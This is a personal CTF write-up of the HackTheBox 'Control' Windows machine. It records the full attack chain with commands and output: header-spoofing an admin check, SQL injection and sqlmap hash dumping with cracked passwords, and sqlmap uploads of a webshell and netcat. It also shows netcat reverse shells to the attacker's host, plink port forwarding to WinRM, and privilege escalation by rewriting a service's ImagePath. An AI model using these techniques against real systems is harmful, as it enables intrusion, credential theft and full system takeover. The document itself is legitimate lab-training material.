HTB Control

April 26, 2020 11-minute read

ctf • windows • services

0x01 Introduction Link to heading

Write up for Control machine on HackTheBox. It was my first “Hard” machine and it was windows-based one. I struggled a lot with root, because I don’t understand windows architecture very well. However, I learnt a lot about windows registry and powershell. Overall, very good machine but really hard for me yet.

0x02 Tools Link to heading

nmap
sqlmap
burp
webshell
powershell
accesschk.exe

0x03 Recon and Enum Link to heading

nmap Link to heading

 1ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.167 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -sC -sV -p$ports -oA control 10.10.10.167
 2Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-24 15:39 AWST
 3Nmap scan report for 10.10.10.167
 4Host is up (0.28s latency).
 5
 6PORT      STATE SERVICE VERSION
 780/tcp    open  http    Microsoft IIS httpd 10.0
 8| http-methods: 
 9|_  Potentially risky methods: TRACE
10|_http-server-header: Microsoft-IIS/10.0
11|_http-title: Fidelity
12135/tcp   open  msrpc   Microsoft Windows RPC
133306/tcp  open  mysql?
1449666/tcp open  msrpc   Microsoft Windows RPC
1549667/tcp open  msrpc   Microsoft Windows RPC
16Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
17
18Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
19Nmap done: 1 IP address (1 host up) scanned in 68.77 seconds

port 80, port 139, and port 3306 are quite interesting. Let’s see what we can find.

http / port 80 Link to heading

The website is written on php 7.3.7 and using IIS 10.0

I checked the source code. Ther was one intersting finding, which might be helpful later:

I tried to access Admin page, and there was an Access Denied error:

Moreover, Login button redirects to the same page admin.php.

dirbuster Link to heading

Nothing really interesting here

Excep for maybe this file:

nikto Link to heading

 1nikto -h http://10.10.10.167
 2- Nikto v2.1.6
 3---------------------------------------------------------------------------
 4+ Target IP:          10.10.10.167
 5+ Target Hostname:    10.10.10.167
 6+ Target Port:        80
 7+ Start Time:         2020-04-24 16:38:23 (GMT8)
 8---------------------------------------------------------------------------
 9+ Server: Microsoft-IIS/10.0
10+ Retrieved x-powered-by header: PHP/7.3.7
11+ The anti-clickjacking X-Frame-Options header is not present.
12+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14+ No CGI Directories found (use '-C all' to force check all possible dirs)
15+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
16+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
17+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
18+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
19+ OSVDB-3092: /admin.php: This might be interesting...
20+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
21+ OSVDB-3092: /license.txt: License file found may identify site software.
22+ OSVDB-3092: /LICENSE.TXT: License file found may identify site software.
23+ 7863 requests: 0 error(s) and 12 item(s) reported on remote host
24+ End Time:           2020-04-24 17:15:54 (GMT8) (2251 seconds)
25---------------------------------------------------------------------------
26+ 1 host(s) tested

burp Link to heading

I got IP address from the website enum and the error that said something about proxy. Obviously, I had to use Burp for that. It also said something about missin headers. I searched on the Internet for a little bit, and found X-Forwarded-For header. According to mozilla

The X-Forwarded-For (XFF) header is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer. When traffic is intercepted between clients and servers, server access logs contain the IP address of the proxy or load balancer only. To see the original IP address of the client, the X-Forwarded-For request header is used.

This header is used for debugging, statistics, and generating location-dependent content and by design it exposes privacy sensitive information, such as the IP address of the client. Therefore the user’s privacy must be kept in mind when deploying this header.

So, I added Request header to replace: X-Forwarded-For: 192.168.4.28 and refreshed the /admin.php webpage. Burp auto-modified the request:

…and I got the following page, which is apparently admin page:

sql Link to heading

Since we know that there was an SQL service running. Let’s check for SQLi on this page.

Looks like it is possible. The users table for this database is mysql.user:

Let’s try UNION SQLi now:

Ok, seems we are on right track, however, need to specify proper number of columns for user table. After a bit of trial and error I got the desired result:

I got 3 different usernames: root, manager, and hector. Also, I password hashes were found.

root:0A4A5CAD344718DC418035A1F4D292BA603134D8

manager:CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA

hector:0E178792E8FC304A2E3133D535D38CAF1DA3CD9D

sqlmap Link to heading

Let’s try to automate the process of detecting and exploiting SQL injection flaws using sqlmap.

1sqlmap -u http://10.10.10.167/search_products.php --data "productName=D-Link+DWA-171" --headers="X-Forwarded-For: 192.168.4.28" --passwords

Overall output of the command. It also attempted to crack the hashed passwords and it was able to crack one, for manager:

 1do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
 2[18:50:19] [INFO] writing hashes to a temporary file '/tmp/sqlmapxg3t1fag272297/sqlmaphashes-u74isl8v.txt' 
 3do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
 4[18:50:25] [INFO] using hash method 'mysql_passwd'
 5what dictionary do you want to use?
 6[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
 7[2] custom dictionary file
 8[3] file with list of dictionary files
 9> 
10[18:50:36] [INFO] using default dictionary
11do you want to use common password suffixes? (slow!) [y/N] n
12[18:50:41] [INFO] starting dictionary-based cracking (mysql_passwd)
13[18:50:41] [INFO] starting 4 processes 
14[18:50:49] [INFO] cracked password 'l3tm3!n' for user 'manager'                                                      
15database management system users password hashes:                                                                    
16[*] hector [1]:
17    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
18[*] manager [1]:
19    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
20    clear-text password: l3tm3!n
21[*] root [1]:
22    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
23
24[18:51:00] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
25
26[*] ending @ 18:51:00 /2020-04-24/

0x04 Exploitation Link to heading

cracking password hashes Link to heading

Using some online (because I was too lazy to use hashcat for that :D) cracking tools I got another password for hector:

Nothing for root, but it was expected.

webshell Link to heading

Knowing the credentials, we can try to upload the shell using sqlmap again. Since we have to specify destination folder, we can refer to IIS architecture and see:

So, we’ll use \inetpub\wwwroot\ folder and upload the webshell php script there.

1
2
3


sqlmap -u http://10.10.10.167/search_products.php --data "productName=D-Link+DWA-171" \
--headers="X-Forwarded-For: 192.168.4.28" --file-dest="/Inetpub/wwwroot/mywebshell.php" \
--file-write="/sngk/CTFs/scripts/Web-Shells/webshell.php"

Good. Let’s try to access it:

Nice. We are logged as iusr. We can now upload nc and get a reverse shell to our machine.

upload nc Link to heading

We’ll use sqlmap again to upload the nc.exe to the victim’s machine:

1
2
3


sqlmap -u http://10.10.10.167/search_products.php --data "productName=D-Link+DWA-171" \
--headers="X-Forwarded-For: 192.168.4.28" --file-dest="/Inetpub/wwwroot/nc.exe" \
--file-write="/usr/share/windows-binaries/nc.exe"

File is uploaded:

nc shell Link to heading

1
2
3
4
5
6


#setup listener on kali:
nc -lvnp 4444

#using webshell:

nc.exe 10.10.14.18 4444 -e cmd

We got shell. Let’s see what else we can do.

 1C:\inetpub\wwwroot>netstat -ano
 2netstat -ano
 3
 4Active Connections
 5
 6  Proto  Local Address          Foreign Address        State           PID
 7  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
 8  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       816
 9  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1904
10  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
11  [...]
12  TCP    10.10.10.167:80        10.10.14.18:54472      ESTABLISHED     4
13  TCP    10.10.10.167:51200     10.10.14.18:4444       ESTABLISHED     3392
14  TCP    [::]:80                [::]:0                 LISTENING       4
15  TCP    [::]:135               [::]:0                 LISTENING       816
16  TCP    [::]:3306              [::]:0                 LISTENING       1904
17  TCP    [::]:5985              [::]:0                 LISTENING       4
18  [...]
19  UDP    [::]:123               *:*                                    1936
20  UDP    [::]:5353              *:*                                    1140
21  UDP    [::]:5355              *:*                                    1140
22
23C:\inetpub\wwwroot>

Moreover, looks like user hector is quite interesting fella:

Seems like port 5985 is open, which is WinRM. Seems we can use port forwarding. Let’s upload plink.exe (port forwarding tool) to access WinRM witn credentials we obtained earlier.

1sqlmap -u http://10.10.10.167/search_products.php --data "productName=D-Link+DWA-171" \
2--headers="X-Forwarded-For: 192.168.4.28" --file-dest="/Inetpub/wwwroot/plink.exe" \
3--file-write="/usr/share/windows-binaries/plink.exe"

Upload successful:

plink Link to heading

As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible

1systemctl start ssh.socket
2systemctl start ssh.service

port to a port in our machine:

1#victim machine
2pl.exe -l root -R 5985:127.0.0.1:5985 10.10.14.18

We can now use use evil-winrm to get elevated shell.

evil-winrm Link to heading

1evil-winrm -i 127.0.0.1 -P 5985 -u hector -p l33th4x0rhector

user flag Link to heading

We can now read the file on hector’s desktop for a flag:

1cat ../Desktop/user.txt

privEsc Link to heading

Lurking on HTB forum, I found out that the key for root is in history file (powershell). Therefore, let’s navigate there.

1cd AppData\Roamin\Microsoft\Windows\PowerShell\PSReadLine
2cat ConsoleHost_history.txt

Well.. we found two commands, let’s run them, right? :D

1get-childitem HKLM:\SYSTEM\CurrentControlset | format-list

Output:

 1Property      : {BootDriverFlags, CurrentUser, EarlyStartServices, PreshutdownOrder...}
 2PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
 3PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
 4PSChildName   : Control
 5PSDrive       : HKLM
 6PSProvider    : Microsoft.PowerShell.Core\Registry
 7PSIsContainer : True
 8SubKeyCount   : 121
 9View          : Default
10Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
11ValueCount    : 11
12Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
13[...]
14Property      : {}
15PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
16PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
17PSChildName   : Services
18PSDrive       : HKLM
19PSProvider    : Microsoft.PowerShell.Core\Registry
20PSIsContainer : True
21SubKeyCount   : 667
22View          : Default
23Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
24ValueCount    : 0
25Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services

Hmm… It just lists the keys under CurentCotrolSet in registry. Let’s check another command.

1get-acl HKLM:\SYSTEM\CurrentControlSet | format-list

Output:

 1Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
 2Owner  : BUILTIN\Administrators
 3Group  : NT AUTHORITY\SYSTEM
 4Access : BUILTIN\Administrators Allow  FullControl
 5         NT AUTHORITY\Authenticated Users Allow  ReadKey
 6         NT AUTHORITY\Authenticated Users Allow  -2147483648
 7         S-1-5-32-549 Allow  ReadKey
 8         S-1-5-32-549 Allow  -2147483648
 9         BUILTIN\Administrators Allow  FullControl
10         BUILTIN\Administrators Allow  268435456
11         NT AUTHORITY\SYSTEM Allow  FullControl
12         NT AUTHORITY\SYSTEM Allow  268435456
13         CREATOR OWNER Allow  268435456
14         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
15         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -2147483648
16         S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  ReadKey
17         S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  -2147483648
18Audit  :
19Sddl   : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOID;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-3-1024-1065365936-12
20         81604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)

Well.. I tried to convert SDDL to a human readable text using this tool and this is what I got:

ok.. seems we have to enum more. Let’s upload some tools for enumeration. Let’s start with PowerUp.ps1

enumeration Link to heading

start python server as usual.

1curl http://10.10.14.18/PowerUp.ps1 -o pup.ps1
2ipmo .\pup.ps1
3invoke-allchecks

Found some useful info:

Let’s try to abuse dll. Well.. it didn’t work apparently. Actually, has it ever worked? I don’t remember ;) Must not be that easy hehe

Ok, there is also unattendPath, something related to panther, which is related to windows installation, let’s see what’s inside that xml file.

Dang.. nothing there.

enumerating services Link to heading

Ok, let’s see what services we can run and actually try to run them. :) because I read about it on HTB forum again hehe (cheating, I know)

We are going to use SysInternals tool called accesschk.exe Accroding to Mircosoft this tool:

As a part of ensuring that they’ve created a secure environment Windows administrators often need to know what kind of accesses specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output.

The use is quite simple, but we have to accept eula first:

1acc.exe /accepteula

Now, we’ll enumerate through services available for hector. I specified parameters as “-kvusqw”. In other words, I told this app to read from registry keys and only print those services that user hector has full access.

1.\acc.exe "hector" -kvuqsw HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services > access.txt
2#copy this text file to kali and let's see what we can do
3vim access.txt

So, I got bunch of services that hector was allowed to read and write to (actually, it looks like there were ALL SERVICES). However, when I tried to config any of them I got Access denied. I guess, I could use brute force to check all the available services and see which ones I could change to actually run something (i.e. cmd.exe).

After a few hours I found the service, which we can use to exploit. I could have used a powershell script to do it faster, however, I decided to do it manually.

Since trigger start services have a “TriggerInfo” key under their registry key with one or more triggers defined beginning with “0”. So, I searched the file access.txt for any occurances of “TriggerInfo" and it wasn’t too much – just 150 matches :D

So, I tried them one-by-one using the following command:

1get-service %servicename%

If Status was “Stopped” I tried to do exploitation. However, sometimes, the system didn’t allow me to start the service. Hence, I had to check another one.

This was the one that actually worked. We can now have to figure out which parameter to change:

 1PS C:\Users\Hector\Documents> set-itemproperty -Path Registry::HKLM\SYSTEM\CurrentControlset\Services\NetSetupSvc -Name ImagePath -Value "C:\InetPub\wwwroot\nc.exe 10.10.14.18 6666 -e C:\Windows\system32\cmd.exe"
 2
 3PS C:\Users\Hector\Documents> get-itemproperty -Path Registry::HKLM\SYSTEM\CurrentControlset\Services\NetSetupSvc
 4
 5[...]
 6FailureActions      : {128, 81, 1, 0...}
 7ImagePath           : C:\InetPub\wwwroot\nc.exe 10.10.14.18 6666 -e C:\Windows\system32\cmd.exe
 8ObjectName          : LocalSystem
 9RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, 
10[...]
11PSPath              : Microsoft.PowerShell.Core\Registry::HKLM\SYSTEM\CurrentControlset\Services\NetSetupSvc
12PSParentPath        : Microsoft.PowerShell.Core\Registry::HKLM\SYSTEM\CurrentControlset\Services
13PSChildName         : NetSetupSvc
14PSProvider          : Microsoft.PowerShell.Core\Registry

All we have to do is to start the service now:

1set-itemproperty -Path Registry::HKLM\SYSTEM\CurrentControlset\Services\NetSetupSvc -Name ImagePath -Value "C:\InetPub\wwwroot\nc.exe 10.10.14.18 6666 -e C:\Windows\system32\cmd.exe" 
2
3get-service NetSetupSvc | start-service

and we got root :)

However, this method is unstable because I lost shell after a couple of minutes. Moreover, I don’t think that “bruteforce” method is really that good.

stable shell Link to heading

Just had to start another listener on different port and run nc.exe within the obtained SYSTEM shell.

1C:\InetPub\wwwroot\nc.exe 10.10.14.18 4444 -e C:\Windows\system32\cmd.exe

The reason it is unstable, because I started nc.exe as a service, and apparently it should die in about few minutes.